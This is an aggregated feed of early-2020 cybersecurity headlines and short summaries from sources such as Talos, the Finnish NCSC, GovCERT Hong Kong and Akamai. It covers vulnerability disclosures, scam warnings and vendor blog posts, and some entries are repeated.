Forbes’ recent cybersecurity predictions for 2020 cited an old quote from Cato Network’s co-founder Shlomo Kramer. Back in 2005, Kramer compared cybersecurity to Alice in Wonderland: you run as fast as you can just to stay in place. Almost 15 years later, the comparison applies perfectly to the state of network security. Despite the diligent... The post Where is Network Security headed in 2020? appeared first on Cato Networks.

https://www.catonetworks.com/blog/where-is-network-security-headed-in-2020/
How I Avoided a Recruiter Scam
2020-02-25T16:30:00Z | 1582648200

Recruitment scams are a serious, but often overlooked risk to job seekers. Those responsible for these schemes often play on the victim's stress levels or professional ego, by using authority to offer something that could be life changing, often with large salaries. I've personally experienced a recruitment scam. In this post, we'll explore the scam that targeted me, and the steps I took that prevented me from becoming a victim.

https://www.akamai.com/blog/trends/how-i-avoided-a-recruiter-scam
Synology DSM findhostd unencrypted credentials disclosure vulnerability
2020-02-25T00:00:00Z | 1582588800

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1173
For information security, 2019 was a year of joy, sorrow and changes
2020-02-24T11:19:49Z | 1582543189

Do you still remember our 5G and Galileo events, Cyber Exercise Guide and the Cybersecurity Label? Are you aware of the Big Game Hunting phenomenon? How about Finnish municipalities’ hot cyber summer 2019 or the frequent Office 365 security breaches? Check out our annual review of the state of information security for a recap of the main cyber developments of 2019, and make your coming cyber year more secure than the last!

https://www.kyberturvallisuuskeskus.fi/en/news/information-security-2019-was-year-joy-sorrow-and-changes
For information security, 2019 was a year of joy, sorrow and changes
2020-02-24T11:19:49Z | 1582543189

Do you still remember our 5G and Galileo events, Cyber Exercise Guide and the Cybersecurity Label? Are you aware of the Big Game Hunting phenomenon? How about Finnish municipalities’ hot cyber summer 2019 or the frequent Office 365 security breaches? Check out our annual review of the state of information security for a recap of the main cyber developments of 2019, and make your coming cyber year more secure than the last!

https://www.kyberturvallisuuskeskus.fi/en/news/information-security-2019-was-year-joy-sorrow-and-changes
Technical support scam calls
2020-02-24T11:13:54Z | 1582542834

Over the past week, Finnish organisations and individuals have been targeted by a large number of calls from scammers claiming to represent Microsoft technical support. The callers claim to have detected an information security problem on the victim's computer, which they then ask the victim to open. The calls appear to come from a Finnish number, with the scammers speaking either English or Finnish. These calls are scams, and there is reason to believe that they are being made from spoofed phone numbers.

https://www.kyberturvallisuuskeskus.fi/en/news/technical-support-scam-calls
Technical support scam calls
2020-02-24T11:13:54Z | 1582542834

Over the past week, Finnish organisations and individuals have been targeted by a large number of calls from scammers claiming to represent Microsoft technical support. The callers claim to have detected an information security problem on the victim's computer, which they then ask the victim to open. The calls appear to come from a Finnish number, with the scammers speaking either English or Finnish. These calls are scams, and there is reason to believe that they are being made from spoofed phone numbers.

https://www.kyberturvallisuuskeskus.fi/en/news/technical-support-scam-calls
High Threat Security Alert (A20-02-06): Vulnerability in Apache Tomcat
2020-02-24T04:00:00Z | 1582516800

Apache Software Foundation has released new versions of Apache Tomcat 7, 8.5 and 9 to address a vulnerability in the Apache JServ Protocol (AJP).

https://www.govcert.gov.hk/en/alerts_detail.php
Moxa AWK-3131A multiple iw_* utilities Use of Hard-coded Credentials Vulnerability
2020-02-24T00:00:00Z | 1582502400

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0928
Moxa AWK-3131A ServiceAgent Use of Hard-coded Cryptographic Key
2020-02-24T00:00:00Z | 1582502400

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0926
Moxa AWK-3131A iw_webs User Configuration Remote Code Execution Vulnerability
2020-02-24T00:00:00Z | 1582502400

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0944
Slic3r libslic3r AMF File AMFParserContext::endElement() out-of-bounds read vulnerability
2020-02-24T00:00:00Z | 1582502400

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1215
Moxa AWK-3131A iw_console conio_writestr Remote Code Execution Vulnerability
2020-02-24T00:00:00Z | 1582502400

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0932
Moxa AWK-3131A iw_webs iw_serverip Parameter Command Injection Vulnerability
2020-02-24T00:00:00Z | 1582502400

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0930
Moxa AWK-3131A iw_webs Account Settings Improper Access Control Vulnerability
2020-02-24T00:00:00Z | 1582502400

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0955
Moxa AWK-3131A WAP Hostname Command Injection Vulnerability
2020-02-24T00:00:00Z | 1582502400

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0931
Moxa AWK-3131A iw_console Privilege Escalation Vulnerability
2020-02-24T00:00:00Z | 1582502400

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0925
Moxa AWK-3131A iw_webs DecryptScriptFile file name Command Injection Vulnerability
2020-02-24T00:00:00Z | 1582502400

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0929
Moxa AWK-3131A iw_webs hostname Authentication Bypass Vulnerability
2020-02-24T00:00:00Z | 1582502400

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0960
Moxa AWK-3131A Encrypted Diagnostic Script Command Injection Vulnerability
2020-02-24T00:00:00Z | 1582502400

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0927
Moxa AWK-3131A ServiceAgent denial-of-service vulnerability
2020-02-24T00:00:00Z | 1582502400

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0938
Eestis on hakanud levima uut tüüpi finantspettused
2020-02-21T10:23:52Z | 1582280632

Jaanuaris registreeris Riigi Infosüsteemi Amet (RIA) 251 intsidenti, mis on umbes sama hulk kui mullu keskmiselt. Üha enam on arenemas finantspettused, kus kurjategijad sihivad võltsarvetega suurte ettevõtete kliendibaasi.

https://ria.ee/uudised/eestis-hakanud-levima-uut-tuupi-finantspettused
Introducing Guardicore Threat Intelligence Firewall
2020-02-19T12:09:00Z | 1582114140

Guardicore?s Threat Intelligence Firewall blocks connections to malicious IPs, limiting security attack surface before reaching critical assets.

https://www.akamai.com/blog/security/introducing-guardicore-threat-intelligence-firewall
CVE-2019-19108
2020-02-19T00:00:00Z | 1582070400

IMPROPER AUTHORIZATION CWE-285 The affected products are vulnerable to a weakness in SNMP service, which allows unauthenticated users to modify the configuration via the service.

https://claroty.com/team82/disclosure-dashboard/cve-2019-19108
In January we updated the look of our cyber weather forecast and dived into cybersecurity phenomena
2020-02-18T13:43:44Z | 1582033424

January saw grey and rainy cyber weather conditions. There were reports of several scams and phishing messages. Vulnerabilities discovered in VPN and Citrix remote access and virtual services were actively used to commit data breaches. Some sun could also be seen peeking through the clouds, however. Network performance was solid, with only a single major performance incident recorded in January. In another ray of sunshine, reported attacks had no impact on the functioning of services thanks to good preparation.

https://www.kyberturvallisuuskeskus.fi/en/news/january-we-updated-look-our-cyber-weather-forecast-and-dived-cybersecurity-phenomena
In January we updated the look of our cyber weather forecast and dived into cybersecurity phenomena
2020-02-18T13:43:44Z | 1582033424

January saw grey and rainy cyber weather conditions. There were reports of several scams and phishing messages. Vulnerabilities discovered in VPN and Citrix remote access and virtual services were actively used to commit data breaches. Some sun could also be seen peeking through the clouds, however. Network performance was solid, with only a single major performance incident recorded in January. In another ray of sunshine, reported attacks had no impact on the functioning of services thanks to good preparation.

https://www.kyberturvallisuuskeskus.fi/en/news/january-we-updated-look-our-cyber-weather-forecast-and-dived-cybersecurity-phenomena
Tackling DGA Based Malware Detection in DNS Traffic
2020-02-18T05:00:00Z | 1582002000

Earlier this year, Akamai's Enterprise team tackled the problem of DGA detection in the wild by using Neural Networks, essentially creating a state-of-the-art solution for near online detection of DGA communication....

https://www.akamai.com/blog/security/tackling-dga-based-malware-detection-in-dns-traffic
CoTURN HTTP Server POST-parsing denial-of-service vulnerability
2020-02-18T00:00:00Z | 1581984000

https://talosintelligence.com/vulnerability_reports/TALOS-2020-0985
CoTURN HTTP Server POST-parsing information leak vulnerability
2020-02-18T00:00:00Z | 1581984000

https://talosintelligence.com/vulnerability_reports/TALOS-2020-0984
Firebase Databases Open to the Internet
2020-02-17T16:14:49Z | 1581956089

The National Cyber Security Centre Finland has received several reports concerning databases on the Firebase platform being open to the internet. Some of the publicly available data appears to include customer and personal data.

https://www.kyberturvallisuuskeskus.fi/en/ajankohtaista/firebaseio-tietokantoja-avoimena-internetiin
Firebase Databases Open to the Internet
2020-02-17T16:14:49Z | 1581956089

The National Cyber Security Centre Finland has received several reports concerning databases on the Firebase platform being open to the internet. Some of the publicly available data appears to include customer and personal data.

https://www.kyberturvallisuuskeskus.fi/en/ajankohtaista/firebaseio-tietokantoja-avoimena-internetiin
Traficom Puts Cybersecurity on the Agenda of Corporate Boards
2020-02-17T16:12:14Z | 1581955934

The National Cyber Security Centre Finland at the Finnish Transport and Communications Agency (NCSC-FI) has put together a cybersecurity handbook to help senior corporate management secure their digital business operations.

https://www.kyberturvallisuuskeskus.fi/en/news/traficom-puts-cybersecurity-agenda-corporate-boards
Traficom Puts Cybersecurity on the Agenda of Corporate Boards
2020-02-17T16:12:14Z | 1581955934

The National Cyber Security Centre Finland at the Finnish Transport and Communications Agency (NCSC-FI) has put together a cybersecurity handbook to help senior corporate management secure their digital business operations.

https://www.kyberturvallisuuskeskus.fi/en/news/traficom-puts-cybersecurity-agenda-corporate-boards
At 21 Tbps, Reaching New Levels of IPv6 Traffic
2020-02-13T16:46:00Z | 1581612360

The global adoption of IPv6 is important to the future of the internet and Akamai has been committed to helping move IPv6 deployment forward ever since we launched production IPv6 support in 2012.

https://www.akamai.com/blog/performance/at-21-tbps-reaching-new-levels-IPv6-traffic
Confidence in SD-WAN is Shaken by Digital Transformation
2020-02-13T11:31:27Z | 1581593487

The post Confidence in SD-WAN is Shaken by Digital Transformation appeared first on Cato Networks.

https://www.catonetworks.com/resources/confidence-in-sd-wan-is-shaken-by-digital-transformation/
Intro to SASE – Secure Access Service Edge
2020-02-12T08:59:15Z | 1581497955

The post Intro to SASE – Secure Access Service Edge appeared first on Cato Networks.

https://www.catonetworks.com/resources/intro-to-sase/
High Threat Security Alert (A20-02-03): Multiple Vulnerabilities in Microsoft Products (February 2020)
2020-02-12T04:00:00Z | 1581480000

Microsoft has released security updates addressing multiple vulnerabilities which affect several Microsoft products or components.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A20-02-04): Multiple Vulnerabilities in Adobe Flash Player and Adobe Reader/Acrobat
2020-02-12T04:00:00Z | 1581480000

Security updates are released for Adobe Flash Player and Adobe Reader/Acrobat to address multiple vulnerabilities.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A20-02-05): Multiple Vulnerabilities in Firefox
2020-02-12T04:00:00Z | 1581480000

Mozilla has published two security advisories (MFSA 2020-05 and MFSA 2020-06) to address multiple browser vulnerabilities.

https://www.govcert.gov.hk/en/alerts_detail.php
Apple Safari FontFaceSet Remote Code Execution Vulnerability
2020-02-12T00:00:00Z | 1581465600

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0967
SD-WAN: Are Managed Services in Your Future?
2020-02-11T15:48:15Z | 1581436095

The post SD-WAN: Are Managed Services in Your Future? appeared first on Cato Networks.

https://www.catonetworks.com/resources/sd-wan-are-managed-services-in-your-future/
6 Ways Deception Technology Levels Up Your SOC
2020-02-11T12:54:00Z | 1581425640

Learn how deception technology enables SOCs to move from simple log aggregation and static detection use-cases to a proactive, low false-positive detection model that heavily automates response mechanisms.

https://www.smokescreen.io/6-ways-deception-technology-levels-up-your-soc/
SASE – Secure Access Service Edge
2020-02-11T12:52:29Z | 1581425549

The post SASE – Secure Access Service Edge appeared first on Cato Networks.

https://www.catonetworks.com/resources/sase-secure-access-service-edge/
Keskkriminaalpolitsei avas küberkuritegude info ja teadete edastamise veebilehe
2020-02-11T08:03:39Z | 1581408219

Tänase ülemaailmse turvalise interneti päeval avas keskkriminaalpolitsei küberkuritegude büroo veebilehe cyber.politsei.ee, mille kaudu saab edastada politseile infot ja teateid küberkuritegudest. Samuti saab saidilt nõu, kuidas tunda ära õngitsuskirju või taastada ligipääs oma isiklikele kontodele.

https://ria.ee/uudised/keskkriminaalpolitsei-avas-kuberkuritegude-info-ja-teadete-edastamise-veebilehe
Security Alert (A20-02-02): Vulnerability in Android
2020-02-11T04:00:00Z | 1581393600

A vulnerability called BlueFrag was found in some Android systems.

https://www.govcert.gov.hk/en/alerts_detail.php
Adobe Acrobat Reader DC Javascript Field Name Information Leak
2020-02-11T00:00:00Z | 1581379200

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0959
Microsoft Office Excel Ordinal43 code execution vulnerability
2020-02-11T00:00:00Z | 1581379200

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0968
Windows 10 win32kbase HMMarkObjectDestroy Arbitrary Code Execution Vulnerability
2020-02-11T00:00:00Z | 1581379200

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0970
Microsoft Media Foundation IMFASFSplitter::Initialize Code Execution Vulnerability
2020-02-11T00:00:00Z | 1581379200

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0946
CVE-2019-19279
2020-02-11T00:00:00Z | 1581379200

IMPROPER INPUT VALIDATION CWE-20 Specially crafted packets sent to Port 50000/UDP of the EN100 Ethernet communication modules could cause a denial-of-service condition on the affected device. A manual reboot is required to recover the service of the device.

https://claroty.com/team82/disclosure-dashboard/cve-2019-19279
The PGP keys in the National Cyber Security Centre’s CERT function are changing
2020-02-10T08:59:39Z | 1581325179

The NCSC-FI Incident Response, NCSC-FI Advisory Signing Key, and NCSC-FI Newsfeed Signing Key in the National Cyber Security Centre’s CERT function are changing. The new keys are available on the Centre's website and on public key servers.

https://www.kyberturvallisuuskeskus.fi/en/news/pgp-keys-national-cyber-security-centres-cert-function-are-changing
The PGP keys in the National Cyber Security Centre’s CERT function are changing
2020-02-10T08:59:39Z | 1581325179

The NCSC-FI Incident Response, NCSC-FI Advisory Signing Key, and NCSC-FI Newsfeed Signing Key in the National Cyber Security Centre’s CERT function are changing. The new keys are available on the Centre's website and on public key servers.

https://www.kyberturvallisuuskeskus.fi/en/news/pgp-keys-national-cyber-security-centres-cert-function-are-changing
10 information security forecasts for 2020
2020-02-10T08:40:38Z | 1581324038

The near future looks quite fair for information security. For example, according to our assessment the impacts of cyber security on business operations have clearly been noticed. Similarly, the link between staff awareness and the level of information security in an organisation has been recognised. Of course, challenges and concerns still exist. Protection against cyber crime and information security vulnerabilities will not become any easier.

https://www.kyberturvallisuuskeskus.fi/en/news/10-information-security-forecasts-2020
10 information security forecasts for 2020
2020-02-10T08:40:38Z | 1581324038

The near future looks quite fair for information security. For example, according to our assessment the impacts of cyber security on business operations have clearly been noticed. Similarly, the link between staff awareness and the level of information security in an organisation has been recognised. Of course, challenges and concerns still exist. Protection against cyber crime and information security vulnerabilities will not become any easier.

https://www.kyberturvallisuuskeskus.fi/en/news/10-information-security-forecasts-2020
Supporting COVID-19 Vaccine Rollouts with Vaccine Edge
2020-02-10T05:00:00Z | 1581310800

Global efforts to produce and distribute the COVID-19 vaccine continue to race ahead. But in many cases, that race is an uphill climb. Beyond the challenges in making enough of the vaccine, educating the public, and the logistics of distributing the doses, there is a new challenge. Bots.

https://www.akamai.com/blog/security/supporting-covid-19-vaccine-rollouts-with-vaccine-edge
Accusoft ImageGear JPEG SOFx Code Execution Vulnerability
2020-02-10T00:00:00Z | 1581292800

https://talosintelligence.com/vulnerability_reports/TALOS-2020-0990
Accusoft ImageGear JPEG jpegread precision code execution vulnerability
2020-02-10T00:00:00Z | 1581292800

https://talosintelligence.com/vulnerability_reports/TALOS-2020-0993
Accusoft ImageGear TIFF tifread code execution vulnerability
2020-02-10T00:00:00Z | 1581292800

https://talosintelligence.com/vulnerability_reports/TALOS-2020-0991
Accusoft ImageGear PCX uncompress_scan_line buffer size computation code execution vulnerability
2020-02-10T00:00:00Z | 1581292800

https://talosintelligence.com/vulnerability_reports/TALOS-2020-0986
Accusoft ImageGear BMP bmp_parsing buffer size computation code execution vulnerability
2020-02-10T00:00:00Z | 1581292800

https://talosintelligence.com/vulnerability_reports/TALOS-2020-0989
Accusoft ImageGear PCX uncompress_scan_line buffer copy operation code execution vulnerability
2020-02-10T00:00:00Z | 1581292800

https://talosintelligence.com/vulnerability_reports/TALOS-2020-0987
Deception Technology 101
2020-02-08T08:14:05Z | 1581149645

Deception technology is now fairly mainstream but still shrouded in vendor speak. Read this detailed guide to understand what the technology is, who it’s for, what it’s capable of doing, how it fits in your security stack, key use cases, and advantages.

https://www.smokescreen.io/deception-technology-101/
Support for Windows 7 and many other products has ended
2020-02-06T11:02:13Z | 1580986933

Support for several Microsoft products ended on 14 January 2020. These include the Windows 7 operating system commonly used in home computers as well as Windows Server 2008, which is part of the Microsoft server distribution family, and its latest R2 version. In practice, termination of support means that Microsoft will no longer provide technical support or software and security updates for the products in question, except for certain exceptions. After the support period ends, operating systems will be more vulnerable to data breaches and other malicious activities. The National Cyber Security Centre recommends that you quickly update or isolate outdated operating systems and programs from the public network.

https://www.kyberturvallisuuskeskus.fi/en/news/support-windows-7-and-many-other-products-has-ended
Support for Windows 7 and many other products has ended
2020-02-06T11:02:13Z | 1580986933

Support for several Microsoft products ended on 14 January 2020. These include the Windows 7 operating system commonly used in home computers as well as Windows Server 2008, which is part of the Microsoft server distribution family, and its latest R2 version. In practice, termination of support means that Microsoft will no longer provide technical support or software and security updates for the products in question, except for certain exceptions. After the support period ends, operating systems will be more vulnerable to data breaches and other malicious activities. The National Cyber Security Centre recommends that you quickly update or isolate outdated operating systems and programs from the public network.

https://www.kyberturvallisuuskeskus.fi/en/news/support-windows-7-and-many-other-products-has-ended
Decommissioning of outgoing services must be carried out carefully
2020-02-06T11:00:08Z | 1580986808

Controlled decommissioning is an essential part of managing the lifecycle of services. This applies technically to the shutdown, removal and destruction of environments, and to deleting the related configurations. If decommissioning procedures are not completed consistently, unused services may continue to run in the background, which can pose significant security risks to the organisation.

https://www.kyberturvallisuuskeskus.fi/en/news/decommissioning-outgoing-services-must-be-carried-out-carefully
Decommissioning of outgoing services must be carried out carefully
2020-02-06T11:00:08Z | 1580986808

Controlled decommissioning is an essential part of managing the lifecycle of services. This applies technically to the shutdown, removal and destruction of environments, and to deleting the related configurations. If decommissioning procedures are not completed consistently, unused services may continue to run in the background, which can pose significant security risks to the organisation.

https://www.kyberturvallisuuskeskus.fi/en/news/decommissioning-outgoing-services-must-be-carried-out-carefully
The SHA-1 hash function has finally been broken
2020-02-06T10:57:52Z | 1580986672

Information technology uses various checksums to verify data integrity. For example, when an operating system update file is downloaded to a computer, its checksum is verified before installation. This occurs several times automatically without the user even noticing. Checksums are generated using cryptographic hash functions. There are different kinds of hash functions. One of these is SHA-1 (Secure Hash Algorithm 1), which has been widely used in digital signatures since 1995. A practical attack against the SHA-1 hash function has been released, and therefore it should no longer be used to verify integrity.

https://www.kyberturvallisuuskeskus.fi/en/news/sha-1-hash-function-has-finally-been-broken
The SHA-1 hash function has finally been broken
2020-02-06T10:57:52Z | 1580986672

Information technology uses various checksums to verify data integrity. For example, when an operating system update file is downloaded to a computer, its checksum is verified before installation. This occurs several times automatically without the user even noticing. Checksums are generated using cryptographic hash functions. There are different kinds of hash functions. One of these is SHA-1 (Secure Hash Algorithm 1), which has been widely used in digital signatures since 1995. A practical attack against the SHA-1 hash function has been released, and therefore it should no longer be used to verify integrity.

https://www.kyberturvallisuuskeskus.fi/en/news/sha-1-hash-function-has-finally-been-broken
Security Alert (A20-02-01): Multiple Vulnerabilities in Cisco Products
2020-02-06T04:00:00Z | 1580961600

Cisco released security advisories to address the vulnerabilities in the Cisco Discovery Protocol implementation of several Cisco products.

https://www.govcert.gov.hk/en/alerts_detail.php
Cursos CERT.br: Inscrições 2020 Abertas
2020-02-05T14:45:00Z | 1580913900

Estão abertas as inscrições para os cursos que serão oferecidos em 2020: https://cert.br/cursos/inscricao/ As turmas oferecidas são: Overview of Creating and Managing CSIRTs: Turma Única: 28 de abril de 2020 Fundamentals of Incident Handling Turma 1: 25 a 29 de maio de 2020 Turma 2: 03 a 07 de agosto de 2020 Advanced Topics in Incident Handling - Novo curso! Turma 1: 19 a 23 de outubro de 2020 Turma 2: 23 a 27 de novembro de 2020 Mais informações sobre os cursos podem ser obtidas na página: https://cert.br/cursos/

https://cert.br/cursos/inscricao/
RIA ID-tarkvara võimaldab nüüdsest Smart-IDga digiallkirjastada
2020-02-05T12:22:45Z | 1580905365

ID-tarkvara DigiDoc4 uues versioonis saab dokumente allkirjastada lisaks ID-kaardile ja mobiil-ID-le ka Smart-IDga.

https://ria.ee/uudised/ria-id-tarkvara-voimaldab-nuudsest-smart-idga-digiallkirjastada
Women in Security: Security Technical Project Manager
2020-02-05T05:00:00Z | 1580878800

We continue to see large-scale online security attacks affecting corporations and public institutions. These attacks are becoming more and more sophisticated, making it harder to protect yourself. The constant evolution of attacks requires innovative solutions that only Akamai can provide....

https://www.akamai.com/blog/culture/women-in-security-security-technical-project-manager
Accusoft ImageGear TIFF TIF_read_stripdata code execution vulnerability
2020-02-05T00:00:00Z | 1580860800

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0972
Mini-SNMPD decode_cnt information leak vulnerability
2020-02-03T00:00:00Z | 1580688000

https://talosintelligence.com/vulnerability_reports/TALOS-2020-0975
Mini-SNMPD decode_int Information Leak Vulnerability
2020-02-03T00:00:00Z | 1580688000

https://talosintelligence.com/vulnerability_reports/TALOS-2020-0976
Mini-SNMPD socket disconnect denial-of-service vulnerability
2020-02-03T00:00:00Z | 1580688000

https://talosintelligence.com/vulnerability_reports/TALOS-2020-0977
Symbolically Executing WebAssembly in Manticore
2020-01-31T14:00:26Z | 1580479226

With the release of Manticore 0.3.3, we’re proud to announce support for symbolically executing WebAssembly (WASM) binaries. WASM is a newly standardized programming language that allows web developers to run code with near-native performance directly within the browser. Manticore 0.3.3 can explore all reachable states in a WASM program, and derive the concrete inputs that […]

https://blog.trailofbits.com/2020/01/31/symbolically-executing-webassembly-in-manticore/
Já se encontra disponível o Quadro de Avaliação de Capacidades de Cibersegurança
2020-01-31T00:00:00Z | 1580428800

O documento em causa apresenta para cada uma das medidas de cibersegurança inscritas no QNRCS, a definição de três níveis de capacidade (Inicial, Intermédio e Avançado), para que as organizações consigam cumprir os cinco objetivos de Cibersegurança - identificar, proteger, detetar, responder e recuperar, tendo em consideração o seu contexto e dimensão.Recorde-se que os níveis de capacidade aplicáveis a cada organização dependem das suas características específicas e o documento apresentado é suficientemente flexível para aplicação em diferentes contextos. A título de exemplo, para uma organização com apenas 5 colaboradores, pode não ser necessária a definição de uma política de segurança totalmente alinhada com os padrões de mercado ou até mesmo deter um procedimento formal documentado para a contratação de pessoal. Para aceder ao documento na integra, clique na imagem abaixo.

https://dyn.cncs.gov.pt/pt/detalhe/art/580/ja-se-encontra-disponivel-o-quadro-de-avaliacao-de-capacidades-de-ciberseguranca
RIA vastvalminud riigi allkirjastamisteenus hoiab asutuse kulusid kokku
2020-01-30T07:39:22Z | 1580369962

Riigi Infosüsteemi Ametil (RIA) on valminud riigi allkirjastamisteenus, mis võimaldab luua ID-kaardi ja mobiil-ID-ga digiallkirjastatud dokumente ning allkirju valideerida. RIA ootab tasuta teenust kasutama kõiki avaliku ülesande täitjaid.

https://ria.ee/uudised/ria-vastvalminud-riigi-allkirjastamisteenus-hoiab-asutuse-kulusid-kokku
IntelMQ Version 2.1.2 released
2020-01-29T13:46:32Z | 1580305592

On 28th January, we released the IntelMQ maintenance version 2.1.2 containing only bugfixes for the 2.1.x release series. The documentation for version 2.1.2 and installation instructions can be found on our github repository. The upcoming version 2.2.0 - and current development version - will have several new features to offer. This blog post is part of a series of blog posts related to our CEF Telecom 2018-AT-IA-0111 project, which also supports our participation in the CSIRTs Network.

https://www.cert.at/en/blog/2020/1/intelmq-version-212-released
TRANSITS II in Utrecht
2020-01-29T09:58:22Z | 1580291902

I had the pleasure to take part in the TRANSITS II training in Utrecht in January 2020. One of the great things about these trainings is that they are not just about tools and techniques, but about getting to know people from other CERTs/CSIRTs, especially from the European community. However, the training part was also fun to have. TRANSITS II is split into three modules, i.e. forensics, communication and NetFlow, distributed over three days. While the netflow part gets a full day on its own, forensics and communication alternate over the other two days. For the practical parts, prepared laptops are provided, which is a good thing because everyone can start working right away, but had the disadvantage that we couldn't practice outside of the course hours and couldn't take any data/scripts/etc. with us. Forensics This module covers a lot of ground and touches many topics to get you started and interested in the field. Of course, you won't become a forensics expert in these few days, but this isn't the goal anyway. In general terms, disk forensics, memory forensics and steganography were covered, always illustrated by examples the instructors had encountered at some point, which was helpful to memorize the content. For the most part, topics are introduced theoretically and then immediately put into practice. This includes non-technical exercises as well, e.g. learning to "seize" a laptop and remove the harddrive to get its serial number while not destroying any evidence and maintaining a thorough protocol as well as a chain of custody. If you've never done this before, you'll see how easy it is to forget to write down something which may lead to real problems in a potential legal case. (And you'll definitely learn how annoying it is to pry open devices when you have to use gloves and can't use your fingernails ;)) We worked on disk images as well as memory images using standard UNIX commands like dd, strings, etc., but also more advanced tools like volatility. At the end of the module, there was a short capture-the-flag-like game where we had to use everything we've learned during the previous two days, which I enjoyed very much. Communication As most people who work in CERTs/CSIRTs know, communication is something we have to do all the time and in many cases it's also where problems are the most obvious, so I consider covering this topic in an otherwise technical training to be a neat idea. First some basic principles of communication according to NLP (neuro-linguistic programming) were introduced and then again we put them in practice. This was an interesting experience, but I thought it to be a bit too little integrated into the context of the class, i.e. we trained very general skills but didn't get into how we can use this in the technical world we work in, something like "how do I communicate technical content in a way that other people (including management) can understand?" NetFlow The last day was a hands-on deep dive into the world of NetFlow and specifically into how to work with NetFlow data using the open source tools nfdump and nfsen. After a general introduction to NetFlow, how sampling impacts what you can see and the tools we were going to use as well as an overview of which others exist out there, we got a dataset and a list of tasks we had to do with it, like finding peaks of certain flow types and interpreting their significance, etc. This playing around was very beneficial for understanding what you can and can't do with NetFlow data. Conclusions The TRANSITS II training is a great oppurtunity to get you started in the fields of forensics and NetFlow and also introduces you to some basic communication skills which are often ignored in other technical trainings. Additionally, it is a good opportunity to get to know other people from the CERT/CSIRT community, so I can wholeheartedly recommend it :) This blog post is part of a series of blog posts related to our CEF Telecom 2018-AT-IA-0111 project, which also supports our participation in the CSIRTs Network.

https://www.cert.at/en/blog/2020/1/transits-ii-in-utrecht
Security Alert (A20-01-06): Multiple Vulnerabilities in Apple iOS and iPadOS
2020-01-29T04:00:00Z | 1580270400

Apple has released iOS 13.3.1 and iPadOS 13.3.1 to fix multiple security vulnerabilities in various Apple devices.

https://www.govcert.gov.hk/en/alerts_detail.php
What SD-WAN Vendors Won’t Tell You About SD-WAN
2020-01-27T09:42:17Z | 1580118137

The post What SD-WAN Vendors Won’t Tell You About SD-WAN appeared first on Cato Networks.

https://www.catonetworks.com/resources/what-sd-wan-vendors-wont-tell-you-about-sd-wan/
Accusoft ImageGear PNG pngread width code execution vulnerability
2020-01-27T00:00:00Z | 1580083200

https://talosintelligence.com/vulnerability_reports/TALOS-2020-0992
The year 2019 ended in a drizzle cyber weather
2020-01-24T07:30:15Z | 1579851015

The cyber climate in December was grey and drizzle. Many of the phenomena that we follow in Finland have minor impacts here than in rest of the world. Our goal is a cyber secure Finland. This, however, requires active measures. The most important measure is to focus on the basics.

https://www.kyberturvallisuuskeskus.fi/en/news/year-2019-ended-drizzle-cyber-weather
The year 2019 ended in a drizzle cyber weather
2020-01-24T07:30:15Z | 1579851015

The cyber climate in December was grey and drizzle. Many of the phenomena that we follow in Finland have minor impacts here than in rest of the world. Our goal is a cyber secure Finland. This, however, requires active measures. The most important measure is to focus on the basics.

https://www.kyberturvallisuuskeskus.fi/en/news/year-2019-ended-drizzle-cyber-weather
Themes from Real World Crypto 2020
2020-01-23T12:00:07Z | 1579780807

Over 642 brilliant cryptographic minds gathered for Real World Crypto 2020, an annual conference that brings together cryptographic researchers with developers implementing cryptography in the wild. Overall, RWC 2020 was an impressive conference that demonstrated some amazing work. Here we explore three major themes that emerged: Crypto bugs are everywhere…Whether it’s a somewhat unsurprising Bleichenbacher […]

https://blog.trailofbits.com/2020/01/23/themes-from-real-world-crypto-2020/
AMD ATI Radeon ATIDXX64.DLL MOVC shader functionality denial-of-service vulnerability
2020-01-21T00:00:00Z | 1579564800

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0936
AMD ATI Radeon ATIDXX64.DLL shader functionality VTABLE remote code execution vulnerability
2020-01-21T00:00:00Z | 1579564800

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0964
AMD ATI Radeon ATIDXX64.DLL shader functionality constant buffer denial-of-service vulnerability
2020-01-21T00:00:00Z | 1579564800

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0913
AMD ATI Radeon ATIDXX64.DLL MAD shader functionality denial-of-service vulnerability
2020-01-21T00:00:00Z | 1579564800

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0937
Abusing the Service Workers API
2020-01-20T05:00:00Z | 1579496400

The Service Worker web API is a powerful new API for web browsers. During our research, we have found several ways attackers can leverage this API to enhance their low-to-medium risk findings into a powerful and meaningful attack. By...

https://www.akamai.com/blog/security/abusing-the-service-workers-api
High Threat Security Alert (A20-01-05): Vulnerability in Microsoft Internet Explorer
2020-01-20T04:00:00Z | 1579492800

Microsoft has published a security advisory (ADV200001) to mitigate a remote code execution vulnerability in the JScript.dll of the Microsoft Internet Explorer.

https://www.govcert.gov.hk/en/alerts_detail.php
Guardicore Centra Release v 31
2020-01-19T14:00:00Z | 1579442400

Guardicore Centra v 31 includes such features as user-based rules and a threat intelligence firewall. Read more about the updates and improvements.

https://www.akamai.com/blog/security/whats-new-in-guardicore-centra-release-31
Exploiting the Windows CryptoAPI Vulnerability
2020-01-16T16:28:34Z | 1579192114

